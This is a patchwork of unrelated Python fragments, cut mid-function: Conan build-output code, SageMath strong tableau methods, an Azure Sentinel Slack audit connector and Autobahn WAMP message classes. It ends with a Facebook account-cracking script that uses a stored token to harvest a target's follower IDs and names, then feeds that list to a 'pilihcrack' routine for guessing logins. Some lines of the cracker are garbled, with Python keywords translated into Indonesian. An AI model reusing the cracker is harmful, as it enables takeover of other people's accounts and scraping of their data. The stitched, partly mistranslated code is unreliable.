strip="left",
placeholder="...",
)
# shorten at path separator
output = re.sub(r"\.{3}[^/\\]+(?=[/\\])", "...", output)
self.screen.print(f"{output:{self.MAX_WIDTH}}", overwrite=True)
elif line.startswith("-- ") or line.lower().startswith("checking "):
self.screen.print(shorten_conan_path(line), overwrite=True)
else:
match = self.parser.SEVERITY_REGEX.match(line)
if not (match and added_first(self._WARNINGS, match.group())):
return
level_name = | |
return [[nabs(v) for v in row] for row in self.to_list()]
    def to_standard_list(self):
        """
        Return the underlying standard strong tableau as a list of lists.

        Internally, for a strong tableau the standard strong tableau and its weight
        is stored separately. This method returns the underlying standard part.

        OUTPUT:

        - a list of lists of integers or ``None``

        EXAMPLES::

            sage: StrongTableau([[-1, -2, -3, 4], [-4], [-5]], 3, [3,1,1]).to_standard_list()
            [[-1, -2, -3, 4], [-4], [-5]]
            sage: StrongTableau([[None, None, -1, -2], [None, None], [-1, -2], [1, 2], [-3], [3], [3], [3]], 4).to_standard_list()
            [[None, None, -2, -4], [None, None], [-1, -3], [2, 4], [-5], [5], [5], [5]]

        TESTS::

            sage: StrongTableau([[None, None], [None]], 4).to_standard_list()
            [[None, None], [None]]
            sage: StrongTableau([],4).to_standard_list()
            []
        """
        # The standard part is stored directly on the instance; the internal
        # list is returned without copying, so callers must not mutate it.
        return self._tableau
    def to_standard_tableau(self):
        """
        Return the underlying standard strong tableau as a ``StrongTableau`` object.

        Internally, for a strong tableau the standard strong tableau and its weight
        is stored separately. This method returns the underlying standard part as a
        ``StrongTableau``.

        OUTPUT:

        - a strong tableau with standard weight

        EXAMPLES::

            sage: T = StrongTableau([[-1, -2, -3, 4], [-4], [-5]], 3, [3,1,1])
            sage: T.to_standard_tableau()
            [[-1, -2, -3, 4], [-4], [-5]]
            sage: T.to_standard_tableau() == T.to_standard_list()
            False
            sage: StrongTableau([[None, None, -1, -2], [None, None], [-1, -2], [1, 2], [-3], [3], [3], [3]], 4).to_standard_tableau()
            [[None, None, -2, -4], [None, None], [-1, -3], [2, 4], [-5], [5], [5], [5]]

        TESTS::

            sage: StrongTableau([[None, None], [None]], 4).to_standard_tableau()
            [[None, None], [None]]
            sage: StrongTableau([],4).to_standard_tableau()
            []
        """
        # Omitting the weight argument gives the standard (weight = 1^n) tableau.
        return StrongTableau(self._tableau, self.k)
def to_unmarked_standard_list( self ):
"""
Return the standard part of the tableau as a list of lists with markings removed.
Return the list of lists of the rows of the tableau where the markings have been
removed.
OUTPUT:
- a list of lists of integers or ``None``
EXAMPLES::
sage: StrongTableau( [[-1, -2, -3, 4], [-4], [-5]], 3, [3,1,1]).to_unmarked_standard_list()
[[1, 2, 3, 4], [4], [5]]
sage: StrongTableau( [[None, None, -1, -2], [None, None], [-1, -2], [1, 2], [-3], [3], [3], [3]], 4).to_unmarked_standard_list()
[[None, None, 2, 4], [None, None], [1, 3], [2, 4], [5], [5], [5], [5]]
TESTS::
sage: StrongTableau([[None, None], [None]], 4).to_unmarked_standard_list()
[[None, None], [None]]
sage: StrongTableau([],4).to_unmarked_standard_list()
[]
"""
return [[nabs(l) for l in x] for x in self.to_standard_list()]
def _latex_(self):
r"""
Return a latex method for the tableau.
EXAMPLES::
sage: T = StrongTableau( [[None, -1, -2, 3], [2, -3]], 2, weight=[2,1] )
sage: Tableaux.options(convention = "English")
sage: latex(T)
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{1-4}
\lr{}&\lr{1^\ast}&\lr{1^\ast}&\lr{2}\\\cline{1-4}
\lr{1}&\lr{2^\ast}\\\cline{1-2}
\end{array}$}
}
sage: Tableaux.options(convention = "French")
sage: latex(T)
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{1-2}
\lr{1}&\lr{2^\ast}\\\cline{1-4}
\lr{}&\lr{1^\ast}&\lr{1^\ast}&\lr{2}\\\cline{1-4}
\end{array}$}
}
"""
def chi(x):
if x is None:
return ""
if x in ZZ:
s = "%s"%abs(x)
if x<0:
s += "^\\ast"
return s
return "%s"%x
T = [[chi(x) for x in row] for row in self.to_list()]
from .output import tex_from_array
return tex_from_array(T)
    def restrict( self, r ):
        r"""
        Restrict the standard part of the tableau to the labels `1, 2, \ldots, r`.

        Return the tableau consisting of the labels of the standard part of ``self``
        restricted to the labels of `1` through ``r``. The result is another
        ``StrongTableau`` object.

        INPUT:

        - ``r`` -- an integer

        OUTPUT:

        - A strong tableau

        EXAMPLES::

            sage: T = StrongTableau([[None, None, -4, 5, -5], [None, None], [-1, -3], [-2], [2], [2], [3]], 4, weight=[1,1,1,1,1])
            sage: T.restrict(3)
            [[None, None], [None, None], [-1, -3], [-2], [2], [2], [3]]
            sage: TT = T.restrict(0)
            sage: TT
            [[None, None], [None, None]]
            sage: TT == StrongTableau( [[None, None], [None, None]], 4 )
            True
            sage: T.restrict(5) == T
            True

        TESTS::

            sage: StrongTableau([[None, None], [None]], 4).restrict(1)
            [[None, None], [None]]
            sage: StrongTableau([],4).restrict(1)
            []
        """
        # Number of standard labels covered by the first r weight entries.
        rr = sum(self.weight()[:r])
        # Keep cells that are None (inner shape) or whose standard label is <= rr,
        # and drop any rows that become empty.
        rest_tab = [y for y in ([x for x in row if x is None or abs(x)<=rr] for row in self.to_standard_list()) if y]
        # Rebuild the parent with the restricted outer shape and truncated weight.
        new_parent = StrongTableaux( self.k, (Core([len(x) for x in rest_tab], self.k+1), self.inner_shape()), self.weight()[:r] )
        return new_parent(rest_tab)
def set_weight( self, mu ):
    """
    Sets a new weight ``mu`` for ``self``.

    This method first tests if the underlying standard tableau is column-strict with
    respect to the weight ``mu``. If it is, then it changes the weight and returns
    the tableau; otherwise it raises an error.

    INPUT:

    - ``mu`` -- a list of non-negative integers representing the new weight

    EXAMPLES::

        sage: StrongTableau( [[-1, -2, -3], [3]], 2 ).set_weight( [3] )
        [[-1, -1, -1], [1]]
        sage: StrongTableau( [[-1, -2, -3], [3]], 2 ).set_weight( [0,3] )
        [[-2, -2, -2], [2]]
        sage: StrongTableau( [[-1, -2, 3], [-3]], 2 ).set_weight( [2, 0, 1] )
        [[-1, -1, 3], [-3]]
        sage: StrongTableau( [[-1, -2, 3], [-3]], 2 ).set_weight( [3] )
        Traceback (most recent call last):
        ...
        ValueError: [[-1, -2, 3], [-3]] is not a semistandard strong tableau with respect to the partition [3]

    TESTS::

        sage: StrongTableau([[None, None], [None]], 4).set_weight([])
        [[None, None], [None]]
        sage: StrongTableau([],4).set_weight([])
        []
    """
    # NOTE(review): when sum(mu) != self.size() the column-strictness check is
    # skipped and the parent construction below is relied upon to reject the
    # inconsistent weight -- confirm this short-circuit is intentional.
    if sum(mu)!=self.size() or self.is_column_strict_with_weight( mu ):
        # Rebuild the parent with the same (outer, inner) shape pair but the
        # new weight, and re-wrap the underlying standard list in it.
        return StrongTableaux.__classcall__(StrongTableaux, self.k, (self.outer_shape(), self.inner_shape()), tuple(mu))(self.to_standard_list())
    else:
        raise ValueError("%s is not a semistandard strong tableau with respect to the partition %s"%(self,mu))
def left_action( self, tij ):
    r"""
    Action of transposition ``tij`` on ``self`` by adding marked ribbons.

    Computes the left action of the transposition ``tij`` on the tableau.
    If ``tij`` acting on the element of the affine Grassmannian raises the length by 1,
    then this function will add a cell to the standard tableau.

    INPUT:

    - ``tij`` -- a transposition represented as a pair `(i, j)`.

    OUTPUT:

    - a new ``StrongTableau`` obtained from ``self`` by the action of ``tij``;
      ``self`` itself is not modified (see the examples below)

    EXAMPLES::

        sage: StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[1,1,1,1] ).left_action([0,1])
        [[None, -1, -2, -3, 5], [3, -5], [-4]]
        sage: StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[1,1,1,1] ).left_action([4,5])
        [[None, -1, -2, -3, -5], [3, 5], [-4]]
        sage: T = StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[1,1,1,1] )
        sage: T.left_action([-3,-2])
        [[None, -1, -2, -3], [3], [-4], [-5]]
        sage: T = StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[3,1] )
        sage: T.left_action([-3,-2])
        [[None, -1, -1, -1], [1], [-2], [-3]]
        sage: T
        [[None, -1, -1, -1], [1], [-2]]
        sage: T.check()
        sage: T.weight()
        (3, 1)

    TESTS::

        sage: StrongTableau([[None, None], [None]], 4).left_action([-2,-1])
        [[None, None], [None], [-1]]
        sage: StrongTableau([],4).left_action([0,1])
        [[-1]]
    """
    # Work on a deep copy so ``self`` is left untouched; the new ribbon gets
    # the next standard label size+1 (the marked head is stored negated).
    T = StrongTableaux._left_action_list(copy.deepcopy( self.to_standard_list() ), tij, self.size()+1, self.k)
    # The result carries one more letter, so the weight is extended by 1.
    return StrongTableau( T, self.k, self.weight()+(1,) )
def follows_tableau( self ):
    r"""
    Return a list of strong marked tableaux with length one longer than ``self``.

    Return list of all strong tableaux obtained from ``self`` by extending to a core
    which follows the shape of ``self`` in the strong order.

    OUTPUT:

    - a list of strong tableaux which follow ``self`` in strong order

    EXAMPLES::

        sage: T = StrongTableau([[-1,-2,-4,-7],[-3,6,-6,8],[4,7],[-5,-8]], 3, [2,2,3,1])
        sage: T.follows_tableau()
        [[[-1, -1, -2, -3, 5, 5, -5], [-2, 3, -3, 4], [2, 3], [-3, -4]],
         [[-1, -1, -2, -3, 5], [-2, 3, -3, 4], [2, 3, 5], [-3, -4], [-5]],
         [[-1, -1, -2, -3, 5], [-2, 3, -3, 4], [2, 3, -5], [-3, -4], [5]],
         [[-1, -1, -2, -3, -5], [-2, 3, -3, 4], [2, 3, 5], [-3, -4], [5]],
         [[-1, -1, -2, -3], [-2, 3, -3, 4], [2, 3], [-3, -4], [-5], [5], [5]]]
        sage: StrongTableau([[-1,-2],[-3,-4]],3).follows_tableau()
        [[[-1, -2, 5, 5, -5], [-3, -4]], [[-1, -2, 5], [-3, -4], [-5]],
         [[-1, -2, -5], [-3, -4], [5]], [[-1, -2], [-3, -4], [-5], [5], [5]]]

    TESTS::

        sage: StrongTableau([[None, None], [None]], 4).follows_tableau()
        [[[None, None, -1], [None]], [[None, None], [None, -1]], [[None, None], [None], [-1]]]
        sage: StrongTableau([],4).follows_tableau()
        [[[-1]]]
    """
    # Label of the newly added letter.
    v = self.size()+1
    out = []
    # For every unsigned standard tableau extending self by one ribbon, mark
    # each possible head cell of the new ribbon with -v to produce a distinct
    # strong marked tableau.
    for T in StrongTableaux.follows_tableau_unsigned_standard( self.to_standard_list(), self.k ):
        for m in StrongTableaux.cells_head_dictionary(T)[v]:
            TT = copy.deepcopy(T)
            TT[m[0]][m[1]] = -v
            out.append(StrongTableau(TT, self.k, self.weight()+(1,)))
    return out
def spin_of_ribbon( self, v ):
r"""
Return the spin of the ribbon with label ``v`` in the standard part of ``self``.
The spin of a ribbon is an integer statistic. It is the sum of `(h-1) r` plus
the number of connected components above the marked one where `h` is the height
of the marked ribbon and `r` is the number of connected components.
.. SEEALSO:: :meth:`height_of_ribbon`, :meth:`number_of_connected_components`,
:meth:`ribbons_above_marked`
| |
import requests
import json
import datetime
import azure.functions as func
import base64
import hmac
import hashlib
import os
import logging
import re
from .state_manager import StateManager
# --- Sentinel Slack-audit connector configuration (read once at import) ---
customer_id = os.environ['WorkspaceID']
shared_key = os.environ['WorkspaceKey']
slack_api_bearer_token = os.environ['SlackAPIBearerToken']
logAnalyticsUri = os.environ.get('logAnalyticsUri')
log_type = 'SlackAudit'
slack_uri_audit = "https://api.slack.com/audit/v1/logs"
offset_limit = 1000
connection_string = os.environ['AzureWebJobsStorage']
# Fall back to the default public-cloud ingestion endpoint when no override
# URI is configured (unset, empty, or whitespace-only).
if logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace():
    logAnalyticsUri = 'https://' + customer_id + '.ods.opinsights.azure.com'
# Validate the endpoint shape before use.  The dot after "azure" is escaped so
# a literal '.' is required; the original pattern ("azure.") let any single
# character through, accepting malformed hosts such as "...azureXcom".
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure\.([a-zA-Z\.]+)$"
match = re.match(pattern, str(logAnalyticsUri))
if not match:
    raise Exception("Invalid Log Analytics Uri.")
def action_mapping(event):
action_id = event["action"]
action_dict = {
"workspace_created": "A workspace in an organization was created.",
"workspace_deleted": "A workspace in an organization was deleted.",
"workspace_accepted_migration": "An administrator on a workspace has accepted an invitation to migrate to a Grid organization.",
"workspace_declined_migration": "An administrator on a workspace has declined an invitation to migrate to a Grid organization.",
"migration_scheduled": "A migration was scheduled.",
"organization_verified": "Slack has confirmed the identity of your organization. The organization will now be denoted with a verified badge.",
"organization_unverified": "Slack has flagged a change in your organization’s identity and has unverified it. The organization will no longer be denoted with a verified badge.",
"organization_public_url_updated": "Your organization’s public URL has been changed.",
"organization_created": "An Enterprise Grid organization was created.",
"organization_deleted": "An Enterprise Grid organization was deleted.",
"organization_accepted_migration": "The Org Owner accepted a workspace invitation to join their organization.",
"organization_declined_migration": "The Org Owner declined a workspace invitation to join their organization.",
"billing_address_added": "A billing address was added. Includes a details parameter noting the timestamp the TOS was accepted.",
"emoji_added": "An emoji was added. Includes a details parameter with the name of the emoji.",
"emoji_removed": "An emoji was removed. Includes a details parameter with the name of the emoji.",
"emoji_aliased": "An emoji was given an alias. Includes a details parameter with the name of the alias.",
"emoji_renamed": "An emoji was renamed. Includes a details parameter with the previous and new names of the emoji.",
"message_tombstoned": "A message was tombstoned.",
"message_restored": "A message was restored.",
"manual_export_started": "A workspace admin or owner has started a standard export on a workspace.",
"manual_export_completed": "A standard export on a workspace has finished.",
"corporate_exports_approved": "The corporate export feature has been approved for use on a workspace.",
"corporate_exports_enabled": "The corporate export feature has been enabled for a workspace.",
"scheduled_export_started": "A scheduled corporate export has started.",
"scheduled_export_completed": "A scheduled corporate export has finished.",
"channels_export_started": "A channel export has begun.",
"channels_export_completed": "A channel export is complete.",
"pref.allow_calls": "A preference indicating whether Slack Calls can be used in this workspace has changed.",
"pref.allow_message_deletion": "Someone altered this workspace's settings around whether messages can be deleted or not.",
"pref.app_dir_only": "Whether only Slack App Directory apps can be installed or not in this workspace has changed.",
"pref.app_whitelist_enabled": "Someone's carefully carved or culled the list of apps this workspace has whitelisted.",
"pref.can_receive_shared_channels_invites": "Whether this workspace can receive invites to share channels with other workspaces has changed.",
"pref.commands_only_regular": "The setting determining whether restricted users are restricted from using slash commands was changed.",
"pref.custom_tos": "This workspace's settings on having a custom terms of service have changed.",
"pref.disallow_public_file_urls": "This workspace has modified their public file URL settings for files uploaded within it.",
"pref.dm_retention_changed": "The direct message (DM) retention setting changed. Includes a details parameter noting the previous and new values.",
"pref.dnd_enabled": "Do not disturb settings have been enabled for a workspace.",
"pref.dnd_end_hour": "The exact ending hour for workspace do not disturb settings has been set. Work hard and go home.",
"pref.dnd_start_hour": "The exact starting hour for workspace do not disturb settings has been set. Hopefully everyone is awake and ready to work by then.",
"pref.emoji_only_admins": "Someone modified the list of emoji-administrating admins, so you know who stole the cookies from the cookie jar.",
"pref.enterprise_default_channels": "Someone modified the list of default channels across the enterprise grid.",
"pref.enterprise_team_creation_request": "Someone has requested that your organization allow a new workspace to be created.",
"pref.file_retention_changed": "The file retention setting changed. Includes a details parameter noting the previous and new values.",
"pref.msg_edit_window_mins": "Someone edited the edit messaging window for a workspace!",
"pref.private_channel_retention_changed": "The group (private channel) retention setting changed. Includes a details parameter noting the previous and new values.",
"pref.public_channel_retention_changed": "The channel retention setting type changed. Includes a details parameter noting the previous and new values.",
"pref.retention_override_changed": "The retention override setting, allowing workspace members to set their own retention period for private channels and DMs, changed. Includes a details parameter noting the previous and new values.",
"pref.sign_in_with_slack_disabled": "This workspace changed their preference around allowing Sign in with Slack.",
"pref.slackbot_responses_disabled": "The settings around whether Slackbot's witty responses are enabled or disabled changed.",
"pref.slackbot_responses_only_admins": "There's a secret cabal of admins for those witty Slackbot responses and that list was changed.",
"pref.sso_setting_changed": "The Single Sign On (SSO) restriction changed. Includes a details parameter noting the previous and new values.",
"pref.stats_only_admins": "The list of admins that can work with workspace statistics only has changed.",
"pref.two_factor_auth_changed": "The two-factor authentication requiremented changed. Includes a details parameter noting the previous and new values.",
"pref.username_policy": "A workspace's username policy preference changed.",
"pref.who_can_archive_channels": "Who can archive channels indeed?",
"pref.who_can_create_delete_user_groups": "The list of who can create or delete user groups changed.",
"pref.who_can_create_private_channels": "It's like a who's who of who can create private channels, and it changed.",
"pref.who_can_create_public_channels": "The same as above, but for public channels.",
"pref.who_can_edit_user_groups": "The list of those who can edit user groups changed.",
"pref.who_can_manage_channel_posting_prefs": "Someone's been changing who can manage channel posting preferences",
"pref.who_can_manage_ext_shared_channels": "The list of who can manage externally shared channels has changed for this workspace.",
"pref.who_can_manage_guests": "The list of who can manage guests now has changed for this workspace.",
"pref.who_can_manage_shared_channels": "Settings around who can remove users from shared channels has changed for a workspace.",
"pref.who_can_remove_from_private_channels": "Settings around who can remove users from private channels has changed for a workspace.",
"pref.who_can_remove_from_public_channels": "Settings around who can remove users from public channels has changed for a workspace.",
"ekm_enrolled": "The workspace is now enrolled/managed by EKM.",
"ekm_unenrolled": "The workspace is no longer enrolled or managed by EKM.",
"ekm_key_added": "An EKM key was added for the workspace.",
"ekm_key_removed": "An EKM key was removed for the workspace.",
"ekm_clear_cache_set": "A revocation event has triggered a new TTL for cached date in this workspace.",
"ekm_logging_config_set": "Logging settings for this workspace's EKM configuration have changed.",
"ekm_slackbot_enroll_notification_sent": "Slack sent notifications about this workspace being enrolled in EKM.",
"ekm_slackbot_unenroll_notification_sent": "Slack sent notifications about this workspace no longer being enrolled in EKM.",
"ekm_slackbot_rekey_notification_sent": "Slack sent notifications about this workspace's EKM configuration being rekeyed.",
"ekm_slackbot_logging_notification_sent": "Slack sent notifications about logging changes to EKM in this workspace.",
"user_channel_join": "A user has joined a channel. The user field in this action contains a team identifier so that you can see which team the joining user comes from (useful for externally shared channels).",
"user_channel_leave": "A user has left a channel. This action contains a team identifier so that you can see which team the departing user comes from (useful for externally shared channels).",
"guest_channel_join": "A guest user has joined a channel. This action contains a team identifier so that you can see which team the joining guest comes from (useful for externally shared channels).",
"guest_channel_leave": "A guest user has left a channel. This action contains a team identifier so that you can see which team the departing guest comes from (useful for externally shared channels).",
"guest_created": "A guest was invited to a channel. This action contains a team identifier so that you can see which team the inviting user comes from.",
"channel_moved": "A channel has been moved to a different workspace.",
"public_channel_created": "A public channel was created.",
"private_channel_created": "A private channel was created.",
"public_channel_archive": "A public channel was archived.",
"private_channel_archive": "A private channel was archived.",
"public_channel_unarchive": "A public channel was unarchived.",
"private_channel_unarchive": "A private channel was unarchived.",
"public_channel_deleted": "A public channel was deleted.",
"private_channel_deleted": "A private channel was deleted.",
"mpim_converted_to_private": "A multi-party direct message was converted to a private channel.",
"public_channel_converted_to_private": "A channel which was once public is now private.",
"channel_email_address_created": "An email forwarding address was created for a | |
type of message.
"""
def __init__(self, reason, message=None):
    """
    :param reason: WAMP or application error URI for aborting reason.
    :type reason: unicode
    :param message: Optional human-readable closing message, e.g. for logging purposes.
    :type message: unicode or None
    """
    # Both fields must be unicode strings; the optional message may be None.
    assert type(reason) == six.text_type
    assert message is None or type(message) == six.text_type
    Message.__init__(self)
    self.reason = reason
    self.message = message
@staticmethod
def parse(wmsg):
    """
    Verifies and parses an unserialized raw message into an actual WAMP message instance.

    :param wmsg: The unserialized raw message.
    :type wmsg: list
    :returns: An instance of this class.
    """
    # The message type code was already checked by WampSerializer.unserialize.
    assert len(wmsg) > 0 and wmsg[0] == Abort.MESSAGE_TYPE
    if len(wmsg) != 3:
        raise ProtocolError("invalid message length {0} for ABORT".format(len(wmsg)))
    details = check_or_raise_extra(wmsg[1], u"'details' in ABORT")
    reason = check_or_raise_uri(wmsg[2], u"'reason' in ABORT")
    # An optional human-readable message may ride along in the details dict.
    message = None
    if u'message' in details:
        candidate = details[u'message']
        if type(candidate) != six.text_type:
            raise ProtocolError("invalid type {0} for 'message' detail in ABORT".format(type(candidate)))
        message = candidate
    return Abort(reason, message)
def marshal(self):
    """
    Marshal this object into a raw message for subsequent serialization to bytes.

    :returns: list -- The serialized raw message.
    """
    # The optional message is only serialized when it is non-empty.
    details = {u'message': self.message} if self.message else {}
    return [Abort.MESSAGE_TYPE, details, self.reason]
def __str__(self):
    """
    Returns string representation of this message.
    """
    rendered = u"Abort(message={0}, reason={1})".format(self.message, self.reason)
    return rendered
class Challenge(Message):
    """
    A WAMP ``CHALLENGE`` message.

    Format: ``[CHALLENGE, Method|string, Extra|dict]``
    """

    MESSAGE_TYPE = 4
    """
    The WAMP message code for this type of message.
    """

    def __init__(self, method, extra=None):
        """
        :param method: The authentication method.
        :type method: unicode
        :param extra: Authentication method specific information.
        :type extra: dict or None
        """
        assert type(method) == six.text_type
        assert extra is None or type(extra) == dict
        Message.__init__(self)
        self.method = method
        # Normalize a missing extra dict to an empty one.
        self.extra = extra or {}

    @staticmethod
    def parse(wmsg):
        """
        Verifies and parses an unserialized raw message into an actual WAMP message instance.

        :param wmsg: The unserialized raw message.
        :type wmsg: list
        :returns: An instance of this class.
        """
        # Message type code already verified by WampSerializer.unserialize.
        assert len(wmsg) > 0 and wmsg[0] == Challenge.MESSAGE_TYPE
        if len(wmsg) != 3:
            raise ProtocolError("invalid message length {0} for CHALLENGE".format(len(wmsg)))
        method = wmsg[1]
        if type(method) != six.text_type:
            raise ProtocolError("invalid type {0} for 'method' in CHALLENGE".format(type(method)))
        extra = check_or_raise_extra(wmsg[2], u"'extra' in CHALLENGE")
        return Challenge(method, extra)

    def marshal(self):
        """
        Marshal this object into a raw message for subsequent serialization to bytes.

        :returns: list -- The serialized raw message.
        """
        return [Challenge.MESSAGE_TYPE, self.method, self.extra]

    def __str__(self):
        """
        Returns string representation of this message.
        """
        return u"Challenge(method={0}, extra={1})".format(self.method, self.extra)
class Authenticate(Message):
    """
    A WAMP ``AUTHENTICATE`` message.

    Format: ``[AUTHENTICATE, Signature|string, Extra|dict]``
    """

    MESSAGE_TYPE = 5
    """
    The WAMP message code for this type of message.
    """

    def __init__(self, signature, extra=None):
        """
        :param signature: The signature for the authentication challenge.
        :type signature: unicode
        :param extra: Authentication method specific information.
        :type extra: dict or None
        """
        assert type(signature) == six.text_type
        assert extra is None or type(extra) == dict
        Message.__init__(self)
        self.signature = signature
        # Normalize a missing extra dict to an empty one.
        self.extra = extra or {}

    @staticmethod
    def parse(wmsg):
        """
        Verifies and parses an unserialized raw message into an actual WAMP message instance.

        :param wmsg: The unserialized raw message.
        :type wmsg: list
        :returns: An instance of this class.
        """
        # Message type code already verified by WampSerializer.unserialize.
        assert len(wmsg) > 0 and wmsg[0] == Authenticate.MESSAGE_TYPE
        if len(wmsg) != 3:
            raise ProtocolError("invalid message length {0} for AUTHENTICATE".format(len(wmsg)))
        signature = wmsg[1]
        if type(signature) != six.text_type:
            raise ProtocolError("invalid type {0} for 'signature' in AUTHENTICATE".format(type(signature)))
        extra = check_or_raise_extra(wmsg[2], u"'extra' in AUTHENTICATE")
        return Authenticate(signature, extra)

    def marshal(self):
        """
        Marshal this object into a raw message for subsequent serialization to bytes.

        :returns: list -- The serialized raw message.
        """
        return [Authenticate.MESSAGE_TYPE, self.signature, self.extra]

    def __str__(self):
        """
        Returns string representation of this message.
        """
        return u"Authenticate(signature={0}, extra={1})".format(self.signature, self.extra)
class Goodbye(Message):
    """
    A WAMP ``GOODBYE`` message.

    Format: ``[GOODBYE, Details|dict, Reason|uri]``
    """

    MESSAGE_TYPE = 6
    """
    The WAMP message code for this type of message.
    """

    DEFAULT_REASON = u"wamp.close.normal"
    """
    Default WAMP closing reason.
    """

    def __init__(self, reason=DEFAULT_REASON, message=None, resumable=None):
        """
        :param reason: Optional WAMP or application error URI for closing reason.
        :type reason: unicode
        :param message: Optional human-readable closing message, e.g. for logging purposes.
        :type message: unicode or None
        :param resumable: From the server: Whether the session is able to be resumed (true) or destroyed (false). From the client: Whether it should be resumable (true) or destroyed (false).
        :type resumable: bool or None
        """
        assert type(reason) == six.text_type
        assert message is None or type(message) == six.text_type
        assert resumable is None or type(resumable) == bool
        Message.__init__(self)
        self.reason = reason
        self.message = message
        self.resumable = resumable

    @staticmethod
    def parse(wmsg):
        """
        Verifies and parses an unserialized raw message into an actual WAMP message instance.

        :param wmsg: The unserialized raw message.
        :type wmsg: list
        :returns: An instance of this class.
        """
        # Message type code already verified by WampSerializer.unserialize.
        assert len(wmsg) > 0 and wmsg[0] == Goodbye.MESSAGE_TYPE
        if len(wmsg) != 3:
            raise ProtocolError("invalid message length {0} for GOODBYE".format(len(wmsg)))
        details = check_or_raise_extra(wmsg[1], u"'details' in GOODBYE")
        reason = check_or_raise_uri(wmsg[2], u"'reason' in GOODBYE")
        # Both detail fields are optional; validate types only when present.
        message = None
        if u'message' in details:
            message = details[u'message']
            if type(message) != six.text_type:
                raise ProtocolError("invalid type {0} for 'message' detail in GOODBYE".format(type(message)))
        resumable = None
        if u'resumable' in details:
            resumable = details[u'resumable']
            if type(resumable) != bool:
                raise ProtocolError("invalid type {0} for 'resumable' detail in GOODBYE".format(type(resumable)))
        return Goodbye(reason=reason,
                       message=message,
                       resumable=resumable)

    def marshal(self):
        """
        Marshal this object into a raw message for subsequent serialization to bytes.

        :returns: list -- The serialized raw message.
        """
        # Only truthy optional fields are serialized into the details dict.
        # NOTE(review): resumable=False is therefore never serialized -- confirm
        # receivers treat an absent 'resumable' the same as False.
        details = {}
        if self.message:
            details[u'message'] = self.message
        if self.resumable:
            details[u'resumable'] = self.resumable
        return [Goodbye.MESSAGE_TYPE, details, self.reason]

    def __str__(self):
        """
        Returns string representation of this message.
        """
        return u"Goodbye(message={}, reason={}, resumable={})".format(self.message, self.reason, self.resumable)
class Error(Message):
"""
A WAMP ``ERROR`` message.
Formats:
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri]``
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri, Arguments|list]``
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri, Arguments|list, ArgumentsKw|dict]``
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri, Payload|string/binary]``
"""
MESSAGE_TYPE = 8
"""
The WAMP message code for this type of message.
"""
def __init__(self, request_type, request, error, args=None, kwargs=None, payload=None,
             enc_algo=None, enc_key=None, enc_serializer=None):
    """
    :param request_type: The WAMP message type code for the original request.
    :type request_type: int
    :param request: The WAMP request ID of the original request (`Call`, `Subscribe`, ...) this error occurred for.
    :type request: int
    :param error: The WAMP or application error URI for the error that occurred.
    :type error: unicode
    :param args: Positional values for application-defined exception.
        Must be serializable using any serializers in use.
    :type args: list or None
    :param kwargs: Keyword values for application-defined exception.
        Must be serializable using any serializers in use.
    :type kwargs: dict or None
    :param payload: Alternative, transparent payload. If given, `args` and `kwargs` must be left unset.
    :type payload: unicode or bytes
    :param enc_algo: If using payload encryption, the algorithm used (currently, only "cryptobox" is valid).
    :type enc_algo: unicode
    :param enc_key: If using payload encryption, the message encryption key.
    :type enc_key: unicode or binary
    :param enc_serializer: If using payload encryption, the encrypted payload object serializer.
    :type enc_serializer: unicode
    """
    # Validate argument types; a transparent payload excludes args/kwargs.
    assert type(request_type) in six.integer_types
    assert type(request) in six.integer_types
    assert type(error) == six.text_type
    assert args is None or type(args) in [list, tuple]
    assert kwargs is None or type(kwargs) == dict
    assert payload is None or type(payload) in [six.text_type, six.binary_type]
    assert payload is None or (args is None and kwargs is None)
    Message.__init__(self)
    self.request_type = request_type
    self.request = request
    self.error = error
    self.args = args
    self.kwargs = kwargs
    self.payload = payload
    # End-to-end application payload encryption metadata.
    self.enc_algo = enc_algo
    self.enc_key = enc_key
    self.enc_serializer = enc_serializer
@staticmethod
def parse(wmsg):
"""
Verifies and parses an unserialized raw message into an actual WAMP message instance.
:param wmsg: The unserialized raw message.
:type wmsg: list
:returns: An instance of this class.
"""
# this should already be verified by WampSerializer.unserialize
#
assert(len(wmsg) > 0 and wmsg[0] == Error.MESSAGE_TYPE)
if len(wmsg) not in (5, 6, 7):
raise ProtocolError("invalid message length {0} | |
%s" % ( len ( id ))))
kembali pilihcrack ( qq )
kecuali Pengecualian sebagai e :
keluar ( p + " \n [" + k + "•" + m + "•" + p + "] Kesalahan : %s" % e )
pasti mengikuti ():
coba :
toket=open("login.txt","r").read()
except IOError:
print((p+"\n ["+k+"•"+m+"•"+p+"] Cookie/Token Invalid"))
os.system("rm -rf login.txt")
logs()
try:
idt = input(p+" ["+k+"•"+m+"•"+p+"] Followers ID Target : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print((p+" ["+k+"•"+m+"•"+p+"] Name: "+op["name"]))
except KeyError:
print((p+" ["+k+"•"+m+"•"+p+"] ID Not Found"))
print((p+"\n [BACK]"+p))
menu()
r=requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=20000&access_token="+toket)
id = []
z=json.loads(r.text)
qq = (op["first_name"]+".json").replace(" ","_")
ys = open(qq , "w")#.replace(" ","_")
for a in z["data"]:
id.append(a["id"]+"<=>"+a["name"])
ys.write(a["id"]+"<=>"+a["name"]+"\n")
ys.close()
print((p+" ["+k+"•"+m+"•"+p+"] Total ID : %s"%(len(id))))
return pilihcrack(qq)
except Exception as e:
exit(p+"\n ["+k+"•"+m+"•"+p+"] Error : %s"%e)
### Krek Nomer su! ###
def random_numbers():
